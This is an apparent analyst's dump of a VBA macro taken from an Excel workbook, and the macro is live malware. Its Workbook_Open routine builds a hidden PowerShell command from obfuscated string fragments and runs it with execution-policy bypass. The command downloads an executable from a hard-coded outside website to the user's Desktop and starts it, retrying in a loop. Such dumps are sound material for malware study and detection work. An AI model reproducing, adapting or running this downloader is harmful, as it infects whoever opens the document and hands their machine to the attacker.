Filename     : ./macros/e2022fd0da3da56ef9e6ff64c97153861bb931d86d9ac31dd37184db2d154714
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function yodamafistella()
dorboola = "VI" + "r','N" + "t','m" + "E') ;  "
yodamafistella = "$7d0m" + "K6 = [" + "Ty" + "pe" + "](\""{1}{0" + "}{3" + "}{2" + "}\"" -f 'on'," + "'eN" + dorboola
End Function


Function diplodosea()
palmaoils = "{D`e" + "s} =  $7d"
diplodosea = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + palmaoils
End Function
Function dabalokok()
dabalokok = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function

Function hablloker()
hablloker = "OaDfiLE.IN"
End Function
Function fanapool()
fanapool = "oP" + "Ro" + "FI -W"
End Function
Function ppoliesterus()
ppoliesterus = "d" + "en" + " -n"
End Function

Function flibaloba()
flibaloba = "nON" + "inT"
End Function
Function topgearbri()
ferraricars = "a"
topgearbri = ferraricars + "ss  " + "  """
End Function
Function fuggarass()
fuggarass = ioslilop + "o -" + flibaloba + "eR" & "a -Ex" + "eC" & "uTI" + "On" + "P b" + "yP" + topgearbri
End Function
Function ioslilop()
ioslilop = "c" + "m" + "d  " + " /" + "c""" & "p" + "Ow" + "Er" + "sHe" + "Ll" + " -n" + fanapool + "in  H" & "iD" + ppoliesterus + "oL"
End Function

Sub Workbook_Open()
pomologos = "p"
If msoArrowheadWidthMixed < 0.87 Then
Dim agorofodo As String
zalkaoreos = msoColorTypeCMYK - 3
Randomize
agorofodo = Int(Rnd * 9882761#)
fimmenos = agorofodo

nishspace = dabalokok + ".Ne','enT','t.WeB','ClI')).dOwNL" + hablloker + "VokE(\""ht" + "t" + "p:/" + "/ton" + "etdog.co" + "m/eco" + "time\"",\""$" + "Des\" + fimmenos + ".e" + "xe\"")}"

berlinootto = diplodosea + "0mk" + "6::gE" + "tFold" + "ErPa" + "TH(\""De" + bvabulgary + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
quttrowheels = goffdrive + fimmenos + ".ex" + "e"""

hubabbuba = fuggarass + yodamafistella + berlinootto + nishspace + quttrowheels

Shell hubabbuba, zalkaoreos
End If
End Sub

Function bvabulgary()
bvabulgary = "sk" + "top"
End Function

Function moonsinrise()
moonsinrise = "s" + "s','ar" + "t'," + "'-" + "Pr')" + " $D"
End Function
Function goffdrive()


joomlasi = "wh"
If 55456 < 844522 Then

goffdrive = joomlasi + "i" + "le(!" + "${?" + "});&(" + "\""{0}{" + "2}{3" + "}{1}" + "\""-f 'S" + "t','o" + "ce" + moonsinrise + "es\"
End If
End Function




